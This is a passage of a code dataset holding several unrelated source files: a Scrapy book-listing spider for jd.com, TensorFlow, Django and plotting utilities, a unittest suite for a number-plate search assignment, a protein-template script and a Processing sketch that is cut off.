+{"seq_id":"630519787","text":"import scrapy\nimport logging\nimport re\n\nlogger = logging.getLogger(__name__)\n\nclass JdbookSpider(scrapy.Spider):\n name = 'jdbook'\n allowed_domains = ['jd.com']\n headers = {\n \"referer\": \"https://book.jd.com/\",\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.47\"\n }\n\n # 主页需要特定的请求头,重写start_requests方法\n def start_requests(self):\n start_url = \"https://pjapi.jd.com/book/sort?source=bookSort\"\n yield scrapy.http.Request(\n url=start_url,\n callback=self.parse,\n headers=self.headers\n )\n\n def parse(self, response):\n data = response.json()\n if data[\"code\"] != 0:\n logger.warning(f\"url: {response.url} 主页请求数据失败\")\n return\n book_data = data[\"data\"]\n for b_cate in book_data:\n item = {}\n item[\"b_cate\"] = b_cate[\"categoryName\"]\n top_cate_id = int(b_cate[\"fatherCategoryId\"])\n father_cate_id = int(b_cate[\"categoryId\"])\n for s_cate in b_cate[\"sonList\"]:\n item[\"s_cate\"] = s_cate[\"categoryName\"]\n cate_id = int(s_cate[\"categoryId\"])\n # https://list.jd.com/list.html?cat=1713,3260,3341\n url = \"https://list.jd.com/list.html?cat=\" + \",\".join((str(id) for id in (top_cate_id, father_cate_id, cate_id)))\n yield scrapy.http.Request(\n url,\n callback=self.parse_book_list,\n headers=self.headers,\n meta={\"item\": item.copy()}\n )\n \n def parse_book_list(self, response):\n item = response.meta[\"item\"].copy()\n li_list = response.xpath(\"//div[@id='J_goodsList']/ul/li\")\n for li in li_list:\n url = li.xpath(\".//div[@class='p-img']/a/img/@data-lazy-img\").extract_first()\n if url:\n item[\"book_img\"] = response.urljoin(url)\n item[\"book_href\"] = response.urljoin(li.xpath(\".//div[@class='p-img']/a/@href\").extract_first())\n item[\"book_name\"] = li.xpath(\".//div[@class='p-name']/a/em/text()\").extract_first()\n item[\"book_author\"] = li.xpath(\".//div[@class='p-bookdetails']/span[@class='p-bi-name']/a/text()\").extract()\n item[\"book_publisher\"] = li.xpath(\".//div[@class='p-bookdetails']/span[@class='p-bi-store']/a/text()\").extract()\n item[\"book_publish_date\"] = li.xpath(\".//div[@class='p-bookdetails']/span[@class='p-bi-date']/text()\").extract_first()\n item[\"book_price\"] = li.xpath(\".//div[@class='p-price']//i/text()\").extract_first()\n print(item)\n yield item\n \n # 翻页,JD页数是按1,3,5,7...\n current_page = int(re.search(r\"page:\\\"(\\d+)\\\"\", response.text).group(1))\n count_page = int(re.search(r\"page_count:\\\"(\\d+)\\\"\", response.text).group(1))\n if current_page < count_page:\n next_page = current_page + 2\n next_url = re.sub(r\"page=\\d+\", \"page={}\".format(next_page), response.url)\n yield scrapy.http.Request(\n next_url,\n callback=self.parse_book_list,\n meta={\"item\": response.meta[\"item\"]}\n )\n\n\n\n","sub_path":"scrapy_tutorial/jd/jd/spiders/jdbook.py","file_name":"jdbook.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"294905441","text":"import tensorflow as tf\n\n\nclass AgentModel(tf.keras.Model):\n def __init__(self, num_actions, hidden_units, num_states):\n super(AgentModel, self).__init__()\n\n # input layer\n self.input_layer = tf.keras.layers.InputLayer(input_shape=())\n\n self.hidden_layers = []\n for i in hidden_units:\n self.hidden_layers.append(tf.keras.layers.Dense(i, activation='tanh', kernel_initializer='RandomNormal'))\n self.output_layer = tf.keras.layers.Dense(num_actions, activation=\"linear\", kernel_initializer='RandomNormal')\n\n @tf.function\n def call(self, input_shape):\n # Build the network from the selected layers with the correct layer shape\n z = self.input_layer(input_shape)\n for layer in self.hidden_layers:\n z = layer(z)\n output = self.output_layer(z)\n return output\n","sub_path":"gamestate_agent/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"48615138","text":"import numpy as np\nimport pickle\nfrom matplotlib import pyplot as plt\n\ndef error_plots(exp, hermite_errors, ordinary_errors, parval, mapping, threshold):\n errors = [hermite_errors, ordinary_errors]\n points = np.arange(0, parval, 1)\n titles = ['L1 norm error', 'L2 norm error', 'Precision', 'Recall', 'Accuracy', 'F1 score']\n file_name = ['_error_L1', '_error_L2', '_precision', '_recall', '_accuracy', '_F1']\n space = ['Hermite', 'Ordinary']\n\n for sp in range(len(space)):\n for fn in range(len(file_name)):\n fig = plt.figure()\n ax = fig.gca()\n for th in range(threshold.shape[0]):\n if (th == 0):\n plt.plot(points, errors[sp][th][fn], 'bo--', label = 'No threshold')\n else:\n plt.plot(points, errors[sp][th][fn], label='threshold ' + str(threshold[th]))\n plt.title(titles[fn] + ' in ' + space[sp] + ' space in 2D')\n plt.grid()\n ax.set_xticks(points)\n plt.xticks(points, mapping)\n plt.legend(bbox_to_anchor = (1.05, 1), loc = 2, borderaxespad = 0.)\n plt.savefig('./' + exp + '/plots/' + space[sp] + file_name[fn]+ '.pdf', format = 'pdf', bbox_inches='tight')\n plt.close()\n","sub_path":"2dcode/error_plots.py","file_name":"error_plots.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"95136363","text":"# pylint:disable=missing-docstring, invalid-name\n\nfrom json import loads\n\nfrom tests.base import BaseCase\n\n\nclass TestWelcome(BaseCase):\n \"\"\"\n Welcome resource tests.\n \"\"\"\n\n def test_welcome(self):\n response = self.client.get('/')\n expected = {\n 'status': 'success',\n 'data': {\n 'message': 'Welcome to Real Estate Manager.'\n }\n }\n self.assertEqual(expected, loads(response.data))\n self.assertEqual(200, response.status_code)\n","sub_path":"tests/test_views/test_welcome.py","file_name":"test_welcome.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"348420168","text":"from django.contrib import admin\nfrom .models import *\n\n# Register your models here.\n\n\nclass SkillAdmin(admin.ModelAdmin):\n list_display = ('name', 'insufficient', 'weak', 'aimed_at', 'beyond', 'course', 'number_eval', 'slug')\n list_filter = ('course', )\n ordering = ('name', 'course', 'number_eval')\n search_fields = ('name', )\n\n fieldsets = (\n # Fieldset 1 : meta-info (titre, auteur…)\n ('General', {\n 'classes': ['collapse', ],\n 'fields': ('name', 'course', 'number_eval', 'slug')\n }),\n # Fieldset 2 : subsidiaires\n ('This skill evaluates : ', {\n 'fields': ('insufficient', 'weak', 'aimed_at', 'beyond')\n }),\n )\n\n prepopulated_fields = {'slug': ('name',), }\n\n\nclass SessionAdmin(admin.ModelAdmin):\n list_display = ('date', 'course', 'number_eval', 'slug')\n list_filter = ('course', )\n date_hierarchy = 'date'\n ordering = ('date', 'course', 'number_eval')\n search_fields = ('course', )\n\n fieldsets = (\n # Fieldset 1 : meta-info (titre, auteur…)\n ('General informations', {\n 'fields': ('date', 'course', 'number_eval', 'slug')\n }),\n )\n\n\nclass CourseAdmin(admin.ModelAdmin):\n list_display = ('name', 'slug')\n list_filter = ('professors', 'students')\n ordering = ('name', )\n search_fields = ('name', )\n\n fieldsets = (\n # Fieldset 1 : meta-info (titre, auteur…)\n ('General informations', {\n 'classes': ['collapse', ],\n 'fields': ('name', 'professors', 'slug')\n }),\n # Fieldset 2 : subsidiaires\n ('List of students', {\n 'fields': ('students',)\n }),\n )\n\n prepopulated_fields = {'slug': ('name',), }\n\n\nclass SKillEvalAdmin(admin.ModelAdmin):\n list_display = ('skill', 'level', 'eval', 'comment')\n list_filter = ('skill',)\n ordering = ('level', 'skill')\n search_fields = ('skill', )\n\n fieldsets = (\n # Fieldset 1 : meta-info (titre, auteur…)\n (\"Contenu de l'évaluation\", {\n 'classes': [\"collapse\", ],\n 'fields': ('skill', 'level', 'eval', 'comment')\n }),\n\n )\n\n\nclass EvaluationAdmin(admin.ModelAdmin):\n list_display = ('session', 'concerned', 'general', 'teacher')\n list_filter = ('concerned', 'teacher')\n ordering = ('concerned', )\n search_fields = ('concerned', 'teacher')\n\n fieldsets = (\n # Fieldset 1 : meta-info (titre, auteur…)\n (\"Contenu de l'évaluation\", {\n 'classes': [\"collapse\", ],\n 'fields': ('session', 'concerned', 'general', 'teacher')\n }),\n )\n\n\nadmin.site.register(Skill, SkillAdmin)\nadmin.site.register(Session, SessionAdmin)\nadmin.site.register(Course, CourseAdmin)\nadmin.site.register(SkillEvaluation, SKillEvalAdmin)\nadmin.site.register(Evaluation, EvaluationAdmin)\n\n\n\n","sub_path":"xprof/teacher_access/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"129148953","text":"def find_smallest(arr):\n \"\"\"Функция находит наименьший элемент в списке\"\"\"\n smallest = arr[0]\n smallest_index = 0\n for i, el in enumerate(arr[1:], start=1):\n if arr[i] < smallest:\n smallest = arr[i]\n smallest_index = i\n return smallest_index\n\n\ndef selection_sort(arr):\n \"\"\"Функция возвращает отсортированный массив\"\"\"\n new_arr = []\n for i in range(len(arr)):\n smallest = find_smallest(arr)\n new_arr.append(arr.pop(smallest))\n return new_arr\n\n\nprint(selection_sort([5, 6, 3, 2, 7, 8, 1]))\n\n","sub_path":"polygon/grokking_algorithms/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"464785149","text":"\"\"\"\ntests.py\nA module of unit tests to verify your answers\nDon't be too worried if you can't understand how they work.\nYou should be able to understand the output though...\nWe recommend starting testing yourself with small lists of values\nso that you can work out the expected result list and expected number\nof comparisons by hand.\n\nThese unit tests aren't going to be that useful for debugging!\n\"\"\"\n\nimport unittest\nimport math\nimport time\nimport utilities\n\nfrom classes import NumberPlate\nfrom stats import StatCounter\nfrom linear_finder import simple_linear_plate_finder\nfrom binary_finder import simple_binary_plate_finder\n\nTEST_FOLDER = './test_data/'\nTEST_FILE_TEMPLATE = '{n_stolen}-{n_sighted}-{n_matches}-{seed}.txt'\nDEF_SEED = 'a' # default seed\n\nreal_comparisons = StatCounter.get_comparisons\n\n\n\nclass TypeAssertion(object):\n\n def assertTypesEqual(self, a, b):\n if type(a) != type(b):\n template = \"Type {} does not match type {}\"\n error_msg = template.format(type(a), type(b))\n raise AssertionError(error_msg)\n\n\nclass BaseTestMethods(unittest.TestCase, TypeAssertion):\n\n def get_bounds(self, left_length, right_length):\n raise NotImplementedError(\"This method should be \"\n \"implemented by a subclass.\")\n\n def use_sorted_stolen(self):\n \"\"\" The binary test subclass will over write this method\n with one that returns True so that the stolen list\n is sorted before the test is run \"\"\"\n return False\n\n def base_filename(self, n_stolen, n_sighted, n_matches, seed=DEF_SEED):\n if self.use_sorted_stolen():\n n_stolen = str(n_stolen) + 's'\n return TEST_FILE_TEMPLATE.format(n_stolen=n_stolen,\n n_sighted=n_sighted,\n n_matches=n_matches,\n seed=seed)\n\n def check_comparisons_within_bounds(self, student_count, n_stolen, n_sighted, n_matches):\n lower, upper = self.get_bounds(n_stolen, n_sighted, n_matches)\n if not lower <= student_count <= upper:\n template = \"{} is not in range {}-{}\"\n error = template.format(student_count, lower, upper)\n raise AssertionError(error)\n # else everything is fine so do nothing\n\n def plates_test(self, n_stolen, n_sighted, n_matches, seed=DEF_SEED):\n \"\"\" Test that the given matching_function returns the correct\n result for the file specified by test_file_name.\n \"\"\"\n base_file = self.base_filename(n_stolen, n_sighted, n_matches, seed)\n stolen, sightings, expected_list = utilities.read_dataset(\n TEST_FOLDER + base_file)\n\n start = time.perf_counter()\n student_answer, comps = self.matching_function(stolen, sightings)\n end = time.perf_counter()\n delta = end - start\n print('{}, c={}, {:.4f}s'.format(base_file, comps, delta), end=' ... ')\n\n self.assertEqual(student_answer, expected_list)\n if len(student_answer) > 0:\n self.assertTypesEqual(student_answer[0], expected_list[0])\n\n def comparisons_test(self, n_stolen, n_sighted, n_matches,\n expected=None, seed=DEF_SEED):\n \"\"\" Test that the number of comparisons that the student made is\n within the expected bounds (provided by self.get_bounds, or expected)\n \"\"\"\n base_file = self.base_filename(n_stolen, n_sighted, n_matches, seed)\n stolen, sighted, _ = utilities.read_dataset(TEST_FOLDER + base_file)\n\n start = time.perf_counter()\n _, student_count = self.matching_function(stolen, sighted)\n end = time.perf_counter()\n delta = end - start\n print('{}, c={}, {:.4f}s'.format(\n base_file, student_count, delta), end=' ... 
')\n\n if expected is not None:\n self.assertEqual(student_count, expected)\n else:\n self.check_comparisons_within_bounds(student_count,\n len(stolen),\n len(sighted),\n n_matches)\n\n def internal_comparisons_test(self,\n n_stolen,\n n_sighted,\n n_matches,\n quiet=False,\n seed=DEF_SEED):\n \"\"\" Test that the student has correctly counted the code against what\n we have counted. This does not mean that the count is correct, just\n that it was correctly counted.\n setting quiet = True means the feedback summary won't be printed,\n which is useful if using along with standard comparisons in\n a single test case.\n \"\"\"\n base_file = self.base_filename(n_stolen, n_sighted, n_matches, seed)\n (stolen, sighted, _) = utilities.read_dataset(TEST_FOLDER + base_file)\n\n start = time.perf_counter()\n _, student_count = self.matching_function(stolen, sighted)\n end = time.perf_counter()\n delta = end - start\n\n # prints student comparisons and time taken\n template = '{}, c={}, {:.4f}s'\n feedback = template.format(base_file, student_count, delta)\n if not quiet:\n print(feedback, end=' ... ')\n\n self.assertEqual(student_count, real_comparisons())\n\n\nclass BaseTester(BaseTestMethods):\n\n def setUp(self):\n \"\"\"Runs before every test case\"\"\"\n StatCounter.reset_comparisons()\n\n\n\n\nclass TinyTests(BaseTester):\n\n #== Tests with a trivially tiny dataset ==#\n def test_010_tiny(self):\n n_stolen, n_sighted, n_matches = 2, 5, 1\n self.plates_test(n_stolen, n_sighted, n_matches)\n\n def test_020_tiny_comps(self):\n n_stolen, n_sighted, n_matches = 2, 5, 1\n self.comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_030_tiny_internal_comps(self):\n n_stolen, n_sighted, n_matches = 2, 5, 1\n self.internal_comparisons_test(n_stolen, n_sighted, n_matches)\n\n\nclass SmallTests(BaseTester):\n\n def test_010_small_no_common(self):\n n_stolen, n_sighted, n_matches = 10, 5, 0\n self.plates_test(n_stolen, n_sighted, n_matches)\n\n def test_020_small_no_common_comps(self):\n n_stolen, n_sighted, n_matches = 10, 5, 0\n self.comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_030_small_no_common_internal_comps(self):\n n_stolen, n_sighted, n_matches = 10, 5, 0\n self.internal_comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_small_some_common(self):\n n_stolen, n_sighted, n_matches = 5, 10, 2\n self.plates_test(n_stolen, n_sighted, n_matches)\n\n def test_small_some_common_comparisons(self):\n n_stolen, n_sighted, n_matches = 5, 10, 2\n self.comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_small_some_common_internal_comparisons(self):\n n_stolen, n_sighted, n_matches = 5, 10, 2\n self.internal_comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_small_all_common(self):\n n_stolen, n_sighted, n_matches = 5, 10, 5\n self.plates_test(n_stolen, n_sighted, n_matches)\n\n def test_small_all_common_comparisons(self):\n n_stolen, n_sighted, n_matches = 5, 10, 5\n self.comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_small_all_common_internal_comparisons(self):\n n_stolen, n_sighted, n_matches = 5, 10, 5\n self.internal_comparisons_test(n_stolen, n_sighted, n_matches)\n\n\nclass MediumTests(BaseTester):\n\n def test_medium_some_common(self):\n n_stolen, n_sighted, n_matches = 100, 1000, 10\n self.plates_test(n_stolen, n_sighted, n_matches)\n\n def test_medium_some_common_comparisons(self):\n n_stolen, n_sighted, n_matches = 100, 1000, 10\n self.comparisons_test(n_stolen, n_sighted, n_matches)\n\n def 
test_medium_some_common_internal_comparisons(self):\n n_stolen, n_sighted, n_matches = 100, 1000, 10\n self.internal_comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_medium_all_common(self):\n n_stolen, n_sighted, n_matches = 100, 1000, 100\n self.plates_test(n_stolen, n_sighted, n_matches)\n\n def test_medium_all_common_comparisons(self):\n n_stolen, n_sighted, n_matches = 100, 1000, 100\n self.comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_medium_all_common_internal_comparisons(self):\n n_stolen, n_sighted, n_matches = 100, 1000, 100\n self.internal_comparisons_test(n_stolen, n_sighted, n_matches)\n\n\n\n\nclass LargeTestsV1(BaseTester):\n\n def test_010_large_no_common(self):\n n_stolen, n_sighted, n_matches = 1000, 1000, 0\n self.plates_test(n_stolen, n_sighted, n_matches)\n\n def test_020_large_no_common_comparisons(self):\n n_stolen, n_sighted, n_matches = 1000, 1000, 0\n self.comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_030_large_no_common_internal_comparisons(self):\n n_stolen, n_sighted, n_matches = 1000, 20000, 0\n self.internal_comparisons_test(n_stolen, n_sighted, n_matches)\n\n\nclass LargeTestsV2(BaseTester):\n\n def test_large_some_common(self):\n n_stolen, n_sighted, n_matches = 100, 1000, 100\n self.plates_test(n_stolen, n_sighted, n_matches)\n\n def test_large_some_common_comparisons(self):\n n_stolen, n_sighted, n_matches = 100, 1000, 100\n self.comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_large_some_common_internal_comparisons(self):\n n_stolen, n_sighted, n_matches = 100, 1000, 100\n self.internal_comparisons_test(n_stolen, n_sighted, n_matches)\n\n\nclass LargeTestsV3(BaseTester):\n\n def test_large_all_common(self):\n n_stolen, n_sighted, n_matches = 1000, 1000, 1000\n self.plates_test(n_stolen, n_sighted, n_matches)\n\n def test_large_all_common_internal_comparisons(self):\n n_stolen, n_sighted, n_matches = 1000, 1000, 1000\n self.comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_large_all_common_comparisons(self):\n n_stolen, n_sighted, n_matches = 1000, 1000, 1000\n self.internal_comparisons_test(n_stolen, n_sighted, n_matches)\n\n\nclass HugeTestsV1(BaseTester):\n\n def test_huge_none_common(self):\n n_stolen, n_sighted, n_matches = 10000, 20000, 0\n self.plates_test(n_stolen, n_sighted, n_matches)\n\n def test_huge_none_common_internal_comparisons(self):\n n_stolen, n_sighted, n_matches = 10000, 20000, 0\n self.comparisons_test(n_stolen, n_sighted, n_matches)\n\n def test_huge_none_common_comparisons(self):\n n_stolen, n_sighted, n_matches = 10000, 20000, 0\n self.internal_comparisons_test(n_stolen, n_sighted, n_matches)\n\n\nclass BaseTestLinear(BaseTester):\n \"\"\" Unit tests for the sequential plate finder.\n Overrides the setUp method to set the macthing function.\n Overrides the get_bounds method to give bounds for linear search version.\n \"\"\"\n\n def setUp(self):\n super().setUp()\n self.matching_function = simple_linear_plate_finder\n\n def get_bounds(self, stolen, seen, matches):\n \"\"\" Note this range is very generous!\n The exact tests will give you a better idea of how\n well your linear function is working\n \"\"\"\n if stolen == matches and stolen < seen:\n lower = matches\n else:\n lower = seen\n return lower, seen * stolen\n\n\n# The following inherit all the base tests and use the methods given in\n# the BaseTestBinary class.\n# Basically it says which function to test and which bounds to use\n# as well as saying to use the files with sorted stolen plates\n# which are 
obviously needed to be able to do binary searching\n\n\n\nclass TinyLinear(BaseTestLinear, TinyTests):\n pass\n\n\nclass SmallLinear(BaseTestLinear, SmallTests):\n pass\n\n\nclass LargeLinearV1(BaseTestLinear, LargeTestsV1):\n pass\n\n\nclass LargeLinearV2(BaseTestLinear, LargeTestsV2):\n pass\n\n\nclass LargeLinearV3(BaseTestLinear, LargeTestsV3):\n pass\n\n\nclass HugeLinearV1(BaseTestLinear, HugeTestsV1):\n pass\n\n\n# Here we do some extra tests with known values\nclass SmallLinearExact(BaseTestLinear):\n\n def test_010_tiny_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 2, 5, 2, 9\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_020_small_no_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 10, 10, 0, 100\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_030_small_some_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 10, 10, 5, 81\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_040_small_all_common_comps_exact(self):\n n_stolen, n_sighted, n_matches = 10, 10, 10\n expected = n_stolen * (n_stolen + 1) // 2\n # can you see why expected must be given by the formula above in this case?\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_045_small_all_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 2, 10, 2, 15\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_048_small_all_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 5, 10, 5, 35\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_050_small2_no_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 10, 100, 0, 1000\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_060_small2_some_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 10, 100, 2, 988\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_070_small2_all_common_comps_exact(self):\n n_stolen, n_sighted, n_matches = 100, 100, 100\n expected = n_stolen * (n_stolen + 1) // 2\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_080_small3_all_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 10, 1000, 10, 9405\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, 
n_matches, quiet=True)\n\n\nclass MediumLinearExact(BaseTestLinear):\n\n def test_010_medium_no_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 100, 1000, 0, 100000\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_020_medium_some_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 100, 1000, 5, 99647\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_030_medium_all_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 100, 1000, 100, 91050\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n\n\n\nclass LargeLinearExact(BaseTestLinear):\n\n def test_010_large_no_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 10000, 20000, 0, 200000000\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_020_large_some_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 10000, 20000, 1000, 194970008\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n def test_030_large_all_common_comps_exact(self):\n n_stolen, n_sighted, n_matches, expected = 1000, 20000, 1000, 19077500\n self.comparisons_test(n_stolen, n_sighted, n_matches, expected)\n StatCounter.reset_comparisons()\n self.internal_comparisons_test(\n n_stolen, n_sighted, n_matches, quiet=True)\n\n\nclass BaseTestBinary(BaseTester):\n \"\"\" Unit tests for the binary plate search function. 
\"\"\"\n\n def setUp(self):\n super().setUp()\n self.matching_function = simple_binary_plate_finder\n\n def get_bounds(self, n_stolen, n_sighted, n_matches):\n if n_stolen > 0:\n log_stolen = int(math.log(n_stolen, 2))\n if n_stolen == n_matches and n_stolen < n_sighted:\n lower = n_matches * (log_stolen + 1) - 2\n else:\n lower = n_sighted * (log_stolen + 1) - 2\n upper = n_sighted * (log_stolen + 2) + 2\n else:\n lower = 0\n upper = 0\n return lower, upper\n\n def use_sorted_stolen(self):\n \"\"\" Will use files with sorted stolen plates.\n For example: 10s-10-10-a.txt has the stolen plates in sorted order\n \"\"\"\n return True\n\n\n# The following classes inherit all the base tests and use the methods given in\n# the BaseTestBinary class.\n# Basically it says which function to test and which bounds to use\n# as well as saying to use the files with sorted stolen plates\n# which are obviously needed to be able to do binary searching\n\n\n\nclass TinyBinary(BaseTestBinary, TinyTests):\n pass\n\n\nclass SmallBinary(BaseTestBinary, SmallTests):\n pass\n\n\nclass LargeBinaryV1(BaseTestBinary, LargeTestsV1):\n pass\n\n\nclass LargeBinaryV2(BaseTestBinary, LargeTestsV2):\n pass\n\n\nclass LargeBinaryV3(BaseTestBinary, LargeTestsV3):\n pass\n\n\nclass HugeBinaryV1(BaseTestBinary, HugeTestsV1):\n pass\n\n\ndef all_tests_suite():\n \"\"\" Combines test cases from various classes to make a\n big suite of tests to run.\n You can comment out tests you don't want to run and uncomment\n tests that you do want to run :)\n \"\"\"\n suite = unittest.TestSuite()\n\n # suite.addTest(unittest.makeSuite(TinyLinear))\n # suite.addTest(unittest.makeSuite(SmallLinear))\n # suite.addTest(unittest.makeSuite(LargeLinearV1))\n # suite.addTest(unittest.makeSuite(LargeLinearV2))\n # suite.addTest(unittest.makeSuite(LargeLinearV3))\n # suite.addTest(unittest.makeSuite(HugeLinearV1))\n # suite.addTest(unittest.makeSuite(SmallLinearExact))\n # suite.addTest(unittest.makeSuite(MediumLinearExact))\n # suite.addTest(unittest.makeSuite(LargeLinearExact))\n\n # IMPORTANT NOTE <==================================================================\n # uncomment the following lines when your are ready for binary testing\n suite.addTest(unittest.makeSuite(TinyBinary))\n suite.addTest(unittest.makeSuite(SmallBinary))\n suite.addTest(unittest.makeSuite(LargeBinaryV1))\n suite.addTest(unittest.makeSuite(LargeBinaryV2))\n suite.addTest(unittest.makeSuite(LargeBinaryV3))\n suite.addTest(unittest.makeSuite(HugeBinaryV1))\n return suite\n\n\n\n\ndef main():\n \"\"\" Makes a test suite and runs it. Will your code pass? \"\"\"\n test_runner = unittest.TextTestRunner(verbosity=2)\n all_tests = all_tests_suite()\n test_runner.run(all_tests)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"1. Linear & Binary Search/student_files/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":20897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"2482026","text":"import mdtraj as md\n\nmanual_pdbs = ['TDIZ_A.pdb', 'TDIZ_B.pdb']\n\nf = open('templates/templates-resolved-seq.fa', 'w')\n\nfor pdb in manual_pdbs:\n traj = md.load('manual_pdbs/' + pdb)\n protein_atoms = traj.top.select('protein')\n traj = traj.atom_slice(protein_atoms)\n traj.save('templates/structures-resolved/KMT5A_HUMAN_%s.pdb' % pdb.split('.')[0])\n resolved_seq = traj.top.to_fasta()[0]\n f.write('\\n>KMT5A_HUMAN_%s\\n' % pdb.split('.')[0])\n f.write(resolved_seq)\n f.write('\\n')\n \nf.close()\n","sub_path":"APO/setup/SETD8_ensembler_26models/gather_manual_templates.py","file_name":"gather_manual_templates.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"228249560","text":"def argsort(seq):\n return sorted(range(len(seq)), key=seq.__getitem__)\n\ndef networkize(img, n_nodes=300, n_neigh=4, DY=0, n_rings=7):\n img.loadPixels()\n n_good = 0\n XX, YY, CC, RR = [], [], [], []\n while n_good < n_nodes:\n x = int(random(img.width))\n y = int(random(img.height))\n R = random(15, 80)\n ndx = y*img.width + x\n c = color(img.pixels[ndx])\n sat = saturation(c)\n if sat > -1:\n good = True\n for xx, yy in zip(XX, YY):\n d = dist(x, y, xx, yy)\n if d < 15 :\n good = False\n if good:\n XX.append(x)\n YY.append(y)\n CC.append(c)\n RR.append(R)\n n_good += 1\n \n for x, y, c, R in zip(XX, YY, CC, RR):\n r = red(c)\n g = green(c)\n b = blue(c)\n dists = []\n for xx, yy in zip(XX, YY):\n dists.append(dist(x,y,xx,yy))\n dists = argsort(dists)\n for dd in dists[:n_neigh]:\n xx = XX[dd]\n yy = YY[dd]\n cc = CC[dd]\n col = (int(0.5*(r+red(cc))), int(0.5*(g+green(cc))), int(0.5*(b+blue(cc))), 30)\n stroke(*col)\n strokeWeight(2)\n #line(x, y+DY, xx, yy+DY)\n \n for x, y, c, R in zip(XX, YY, CC, RR):\n r = red(c)\n g = green(c)\n b = blue(c)\n dr = R/n_rings\n \n for i in range(n_rings):\n a = 